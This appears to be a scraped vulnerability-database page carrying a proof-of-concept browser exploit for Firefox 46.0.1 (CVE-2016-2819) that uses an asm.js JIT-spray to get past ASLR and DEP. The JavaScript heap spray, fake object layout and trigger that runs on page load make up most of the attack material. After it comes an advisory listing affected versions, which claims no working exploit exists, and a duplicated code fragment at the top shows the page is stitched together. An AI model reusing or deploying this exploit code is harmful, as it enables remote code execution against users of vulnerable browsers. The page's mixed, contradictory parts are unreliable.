var Heap = function(target_addr, eip){
    this.node_heap = []
};
 
 
Heap.prototype.spray = function(node_target_addr, target_eip){
    var junk = 0x13371337
    var current_address = 0x08000000
    var block_size = 0x1000000
    while(current_address < node_target_addr){
        var fake_objects = new Uint32Array(block_size/4 - 0x100)
        for (var offset = 0; offset < block_size; offset += 0x100000){
            /* target Node object needed to control EIP  */
            fake_objects[offset/4 + 0x00/4] = 0x29 
            fake_objects[offset/4 + 0x0c/4] = 3
            fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
            fake_objects[offset/4 + 0x18/4] = 1
            fake_objects[offset/4 + 0x1c/4] = junk
            fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
            fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
            fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
            fake_objects[offset/4 + 0x2c/4] = target_eip 
        }
        this.node_heap.push(fake_objects)
        current_address += block_size
    }
};
 
Heap.prototype.gc = function(){
    for (var i=0; i<=10; i++)
        var x = new ArrayBuffer(0x1000000)
};
 
</script>
</head>
<body onload='exploit = new Exploit(); exploit.go()' />

    

- Vulnerability information (F146818)

Firefox 46.0.1 ASM.JS JIT-Spray Remote Code Execution (PacketStormID:F146818)
2018-03-16 00:00:00
Rh0  
exploit,remote,code execution
CVE-2016-2819,CVE-2017-5375

Firefox version 46.0.1 ASM.JS JIT-Spray remote code execution exploit.

<!DOCTYPE HTML>
 
<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 46.0.1 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 46.0.1 32-bit
    2) A successful exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
 
 
    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
     
    (C) Rh0
 
    Mar. 13, 2018
 
-->
 
<title>CVE-2016-2819 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"
 
var Exploit = function(){
    this.asmjs = new Asmjs()
    this.heap = new Heap()
}
 
Exploit.prototype.go = function(){
    /* target address of fake node object */
    var node_target_addr = 0x5a500000 
 
    /* target address of asm.js float pool payload*/
    var target_eip = 0x20200b58
 
    /* spray asm.js float constant pools */
    this.asmjs.spray_float_payload(0x1000)
 
    /* spray fake Node objects */
    this.heap.spray(node_target_addr, target_eip)
 
    /* go! */
    this.trigger_vuln(node_target_addr)
};
 
 
Exploit.prototype.trigger_vuln = function(node_ptr){
    document.body.innerHTML = '<table><svg><div id="BBBB">'
    this.heap.gc()
    var a = new Array() 
    for (var i=0; i < 0x10100; i++){
        /* array element (Node object ptr) control with integer underflow */
        a[i] = new Uint32Array(0x100/4)
        for (var j=0; j<0x100/4; j++)
            a[i][j] = node_ptr 
    }
 
    /* original crashing testcase
    document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}</style>'
    */
 
    /* easier to exploit codepath */
    document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}<DD>'
 
    window.location.reload()
};
 
 
var Asmjs = function(){};
 
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
    "use asm"
    var foo = ffi.foo
    function payload(){
        var val = 0.0
        /* Fx 46.0.1 float constant pool of size 0xc0 is at 0xXXXX0b58*/
        val = +foo(
            // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
        )
        return +val;
    }
    return payload
};
 
Asmjs.prototype.spray_float_payload = function(regions){
    this.modules = new Array(regions).fill(null).map(
        region => this.asm_js_module(window, {foo: () => 0})
    )
};
 
var Heap = function(target_addr, eip){
    this.node_heap = []
};
 
 
Heap.prototype.spray = function(node_target_addr, target_eip){
    var junk = 0x13371337
    var current_address = 0x20000000
    var block_size = 0x1000000
    while(current_address < node_target_addr){
        var fake_objects = new Uint32Array(block_size/4 - 0x100)
        for (var offset = 0; offset < block_size; offset += 0x100000){
            /* target Node object needed to control EIP  */
            fake_objects[offset/4 + 0x00/4] = 0x29 
            fake_objects[offset/4 + 0x0c/4] = 3
            fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
            fake_objects[offset/4 + 0x18/4] = 1
            fake_objects[offset/4 + 0x1c/4] = junk
            fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
            fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
            fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
            fake_objects[offset/4 + 0x2c/4] = target_eip 
        }
        this.node_heap.push(fake_objects)
        current_address += block_size
    }
};
 
Heap.prototype.gc = function(){
    for (var i=0; i<=10; i++)
        var x = new ArrayBuffer(0x1000000)
};
 
</script>
</head>
<body onload='exploit = new Exploit(); exploit.go()' />

    

- Vulnerability information

Mozilla Firefox CVE-2017-5375 ASLR and DEP Security Bypass Vulnerability
Design Error 95757
Yes No
2017-01-24 12:00:00 2017-01-24 12:00:00
Rh0

- Affected program versions

Mozilla Firefox ESR 45.5.1
Mozilla Firefox ESR 38.6.1
Mozilla Firefox ESR 38.5.2
Mozilla Firefox ESR 38.5.1
Mozilla Firefox ESR 38.1.1
Mozilla Firefox ESR 31.5.3
Mozilla Firefox ESR 24.1
Mozilla Firefox ESR 24.0.1
Mozilla Firefox ESR 17.0.10
Mozilla Firefox ESR 17.0.9
Mozilla Firefox ESR 17.0.7
Mozilla Firefox ESR 17.0.6
Mozilla Firefox ESR 17.0.5
Mozilla Firefox ESR 17.0.4
Mozilla Firefox ESR 17.0.3
Mozilla Firefox ESR 17.0.2
Mozilla Firefox ESR 17.0.1
Mozilla Firefox ESR 10.0.12
Mozilla Firefox ESR 10.0.10
Mozilla Firefox ESR 10.0.8
Mozilla Firefox ESR 10.0.7
Mozilla Firefox ESR 10.0.5
Mozilla Firefox ESR 10.0.4
Mozilla Firefox ESR 10.0.3
Mozilla Firefox ESR 45.6
Mozilla Firefox ESR 45.5
Mozilla Firefox ESR 45.4
Mozilla Firefox ESR 45.3
Mozilla Firefox ESR 45.2
Mozilla Firefox ESR 45.1
Mozilla Firefox ESR 38.8
Mozilla Firefox ESR 38.7
Mozilla Firefox ESR 38.6
Mozilla Firefox ESR 38.5
Mozilla Firefox ESR 38.4
Mozilla Firefox ESR 38.3
Mozilla Firefox ESR 38.2.1
Mozilla Firefox ESR 38.2
Mozilla Firefox ESR 38.1
Mozilla Firefox ESR 31.8
Mozilla Firefox ESR 31.7
Mozilla Firefox ESR 31.6
Mozilla Firefox ESR 31.5.2
Mozilla Firefox ESR 31.5
Mozilla Firefox ESR 31.4
Mozilla Firefox ESR 31.3.0
Mozilla Firefox ESR 31.3
Mozilla Firefox ESR 31.2
Mozilla Firefox ESR 31.1.1
Mozilla Firefox ESR 31.1.0
Mozilla Firefox ESR 31.1
Mozilla Firefox ESR 31.0
Mozilla Firefox ESR 24.8.1
Mozilla Firefox ESR 24.8
Mozilla Firefox ESR 24.7
Mozilla Firefox ESR 24.6
Mozilla Firefox ESR 24.5
Mozilla Firefox ESR 24.4
Mozilla Firefox ESR 24.3
Mozilla Firefox ESR 24.2
Mozilla Firefox ESR 24.1.1
Mozilla Firefox ESR 24.1
Mozilla Firefox ESR 24.0.2
Mozilla Firefox ESR 24.0
Mozilla Firefox ESR 17.0.8
Mozilla Firefox ESR 17.0.11
Mozilla Firefox ESR 17.0
Mozilla Firefox ESR 10.0.9
Mozilla Firefox ESR 10.0.6
Mozilla Firefox ESR 10.0.2
Mozilla Firefox ESR 10.0.11
Mozilla Firefox ESR 10.0.1
Mozilla Firefox ESR 10.0
Mozilla Firefox 50.0.2
Mozilla Firefox 50.0.1
Mozilla Firefox 43.0.2
Mozilla Firefox 43.0.1
Mozilla Firefox 41.0.2
Mozilla Firefox 39.0.3
Mozilla Firefox 37.0.2
Mozilla Firefox 37.0.1
Mozilla Firefox 36.0.4
Mozilla Firefox 31.8
Mozilla Firefox 29.0.1
Mozilla Firefox 28.0.1
Mozilla Firefox 27.0.1
Mozilla Firefox 25.0.1
Mozilla Firefox 24.1.1
Mozilla Firefox 22.0 4917
Mozilla Firefox 19.0.2
Mozilla Firefox 19.0.1
Mozilla Firefox 17.0.10
Mozilla Firefox 17.0.7
Mozilla Firefox 17.0.6
Mozilla Firefox 17.0.5
Mozilla Firefox 17.0.4
Mozilla Firefox 17.0.3
Mozilla Firefox 17.0.2
Mozilla Firefox 16.0.2
Mozilla Firefox 16.0.1
Mozilla Firefox 15.0.1
Mozilla Firefox 13.0.1
Mozilla Firefox 10.0.12
Mozilla Firefox 9.0.1
Mozilla Firefox 3.6.28
Mozilla Firefox 3.6.22
Mozilla Firefox 3.6.13
Mozilla Firefox 3.6.10
Mozilla Firefox 3.6.9
Mozilla Firefox 3.6.8
Mozilla Firefox 3.6.6
Mozilla Firefox 3.6.4
Mozilla Firefox 3.6.3
Mozilla Firefox 3.6.2
Mozilla Firefox 3.6.1
Mozilla Firefox 3.5.16
Mozilla Firefox 3.5.14
Mozilla Firefox 3.5.13
Mozilla Firefox 3.5.10
Mozilla Firefox 3.5.9
Mozilla Firefox 3.5.8
Mozilla Firefox 3.5.7
Mozilla Firefox 3.5.6
Mozilla Firefox 3.5.5
Mozilla Firefox 3.5.4
Mozilla Firefox 3.5.3
Mozilla Firefox 3.5.2
Mozilla Firefox 3.5.1
Mozilla Firefox 3.5
Mozilla Firefox 3.0.18
Mozilla Firefox 3.0.17
Mozilla Firefox 3.0.16
Mozilla Firefox 3.0.15
Mozilla Firefox 3.0.14
Mozilla Firefox 3.0.13
Mozilla Firefox 3.0.12
Mozilla Firefox 3.0.11
Mozilla Firefox 3.0.10
Mozilla Firefox 3.0.9
Mozilla Firefox 3.0.8
Mozilla Firefox 3.0.7
Mozilla Firefox 3.0.6
Mozilla Firefox 3.0.5
Mozilla Firefox 3.0.4
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla Firefox 3.0.1
Mozilla Firefox 2.0 20
Mozilla Firefox 2.0 .9
Mozilla Firefox 2.0 .8
Mozilla Firefox 2.0 .7
Mozilla Firefox 2.0 .6
Mozilla Firefox 2.0 .5
Mozilla Firefox 2.0 .4
Mozilla Firefox 2.0 .3
Mozilla Firefox 2.0 .19
Mozilla Firefox 2.0 .17
Mozilla Firefox 2.0 .16
Mozilla Firefox 2.0 .10
Mozilla Firefox 2.0 .1
Mozilla Firefox 1.5.8
Mozilla Firefox 1.5.7
Mozilla Firefox 1.5.6
Mozilla Firefox 1.5.5
Mozilla Firefox 1.5.4
Mozilla Firefox 1.5.2
Mozilla Firefox 1.5.1
Mozilla Firefox 1.5 12
Mozilla Firefox 1.5 .8
Mozilla Firefox 1.5
Mozilla Firefox 1.0.8
Mozilla Firefox 1.0.7
Mozilla Firefox 1.0.6
Mozilla Firefox 1.0.5
Mozilla Firefox 1.0.4
Mozilla Firefox 1.0.3
Mozilla Firefox 1.0.2
Mozilla Firefox 1.0.1
Mozilla Firefox 1.0
Mozilla Firefox 0.10.1
Mozilla Firefox 0.10
Mozilla Firefox 0.9.3
Mozilla Firefox 0.9.2
Mozilla Firefox 0.9.1
Mozilla Firefox 0.9
Mozilla Firefox 0.8
Mozilla Firefox 0.6.1
Mozilla Firefox 0.0.13
Mozilla Firefox 9.0
Mozilla Firefox 8.0.1
Mozilla Firefox 8.0
Mozilla Firefox 7.0.1
Mozilla Firefox 7.0
Mozilla Firefox 7
Mozilla Firefox 6.0.2
Mozilla Firefox 6.0.1
Mozilla Firefox 6.0
Mozilla Firefox 6
Mozilla Firefox 50.1
Mozilla Firefox 50
Mozilla Firefox 5.0.1
Mozilla Firefox 5.0
Mozilla Firefox 49.0.2
Mozilla Firefox 49.0.1
Mozilla Firefox 49
Mozilla Firefox 48
Mozilla Firefox 47
Mozilla Firefox 46.0.1
Mozilla Firefox 46
Mozilla Firefox 45.0.2
Mozilla Firefox 45
Mozilla Firefox 44.0.2
Mozilla Firefox 44
Mozilla Firefox 43
Mozilla Firefox 42
Mozilla Firefox 41
Mozilla Firefox 40.0.3
Mozilla Firefox 40
Mozilla Firefox 4.0.1
Mozilla Firefox 4.0
Mozilla Firefox 39
Mozilla Firefox 38
Mozilla Firefox 37
Mozilla Firefox 36.0.3
Mozilla Firefox 36
Mozilla Firefox 35.0.1
Mozilla Firefox 35
Mozilla Firefox 34.0.5
Mozilla Firefox 34
Mozilla Firefox 33.0
Mozilla Firefox 33
Mozilla Firefox 32.0.3
Mozilla Firefox 32.0
Mozilla Firefox 32
Mozilla Firefox 31.8
Mozilla Firefox 31.6
Mozilla Firefox 31.1.0
Mozilla Firefox 31.1
Mozilla Firefox 31.0
Mozilla Firefox 31
Mozilla Firefox 30.0
Mozilla Firefox 30
Mozilla Firefox 3.6.7
Mozilla Firefox 3.6.27
Mozilla Firefox 3.6.26
Mozilla Firefox 3.6.25
Mozilla Firefox 3.6.24
Mozilla Firefox 3.6.23
Mozilla Firefox 3.6.21
Mozilla Firefox 3.6.20
Mozilla Firefox 3.6.19
Mozilla Firefox 3.6.18
Mozilla Firefox 3.6.17
Mozilla Firefox 3.6.16
Mozilla Firefox 3.6.15
Mozilla Firefox 3.6.14
Mozilla Firefox 3.6.12
Mozilla Firefox 3.6.11
Mozilla Firefox 3.6
Mozilla Firefox 3.5.19
Mozilla Firefox 3.5.18
Mozilla Firefox 3.5.17
Mozilla Firefox 3.5.15
Mozilla Firefox 3.5.12
Mozilla Firefox 3.5.11
Mozilla Firefox 3.1
Mozilla Firefox 3.0.19
Mozilla Firefox 3.0
Mozilla Firefox 29.0
Mozilla Firefox 29
Mozilla Firefox 28.0
Mozilla Firefox 28
Mozilla Firefox 27.0
Mozilla Firefox 27
Mozilla Firefox 26.0
Mozilla Firefox 26
Mozilla Firefox 25.0
Mozilla Firefox 24.1
Mozilla Firefox 24.0
Mozilla Firefox 23.0.1
Mozilla Firefox 23.0
Mozilla Firefox 22.0
Mozilla Firefox 21.0
Mozilla Firefox 20.0.1
Mozilla Firefox 20.0
Mozilla Firefox 2.0.0.21
Mozilla Firefox 2.0.0.2
Mozilla Firefox 2.0.0.19
Mozilla Firefox 2.0.0.18
Mozilla Firefox 2.0.0.15
Mozilla Firefox 2.0.0.14
Mozilla Firefox 2.0.0.13
Mozilla Firefox 2.0.0.12
Mozilla Firefox 2.0.0.11
Mozilla Firefox 2.0 RC3
Mozilla Firefox 2.0 RC2
Mozilla Firefox 2.0 Beta1
Mozilla Firefox 2.0 beta 1
Mozilla Firefox 2.0 8
Mozilla Firefox 2.0 .9
Mozilla Firefox 2.0 .7
Mozilla Firefox 2.0 .6
Mozilla Firefox 2.0 .5
Mozilla Firefox 2.0 .4
Mozilla Firefox 2.0 .10
Mozilla Firefox 2.0 .1
Mozilla Firefox 2.0
Mozilla Firefox 19.0
Mozilla Firefox 18.0.2
Mozilla Firefox 18.0.1
Mozilla Firefox 18.0
Mozilla Firefox 17.0.9
Mozilla Firefox 17.0.8
Mozilla Firefox 17.0.11
Mozilla Firefox 17.0.1
Mozilla Firefox 17.0
Mozilla Firefox 16.0
Mozilla Firefox 16
Mozilla Firefox 15.0
Mozilla Firefox 15
Mozilla Firefox 14.01
Mozilla Firefox 14.0.1
Mozilla Firefox 14.0
Mozilla Firefox 14
Mozilla Firefox 13.0
Mozilla Firefox 12.0 Beta6
Mozilla Firefox 12.0
Mozilla Firefox 11.0
Mozilla Firefox 10.0.9
Mozilla Firefox 10.0.8
Mozilla Firefox 10.0.7
Mozilla Firefox 10.0.6
Mozilla Firefox 10.0.5
Mozilla Firefox 10.0.4
Mozilla Firefox 10.0.3
Mozilla Firefox 10.0.2
Mozilla Firefox 10.0.11
Mozilla Firefox 10.0.10
Mozilla Firefox 10.0.1
Mozilla Firefox 10.0
Mozilla Firefox 10
Mozilla Firefox 1.8
Mozilla Firefox 1.5.3
Mozilla Firefox 1.5.0.9
Mozilla Firefox 1.5.0.7
Mozilla Firefox 1.5.0.6
Mozilla Firefox 1.5.0.5
Mozilla Firefox 1.5.0.4
Mozilla Firefox 1.5.0.3
Mozilla Firefox 1.5.0.2
Mozilla Firefox 1.5.0.11
Mozilla Firefox 1.5.0.10
Mozilla Firefox 1.5.0.1
Mozilla Firefox 1.4.1
Mozilla Firefox 0.7
Mozilla Firefox 0.6
Mozilla Firefox 0.5
Mozilla Firefox 0.3
Mozilla Firefox 0.2
Mozilla Firefox 0.1

- Unaffected program versions

Mozilla Firefox ESR 45.7
Mozilla Firefox 51

- Vulnerability discussion

Mozilla Firefox is prone to a security-bypass vulnerability.

An attacker can leverage this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks.

This issue is fixed in the following versions:

Firefox ESR 45.7
Firefox 51

- Exploit

Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

Updates are available. Please see the references or vendor advisory for more information.
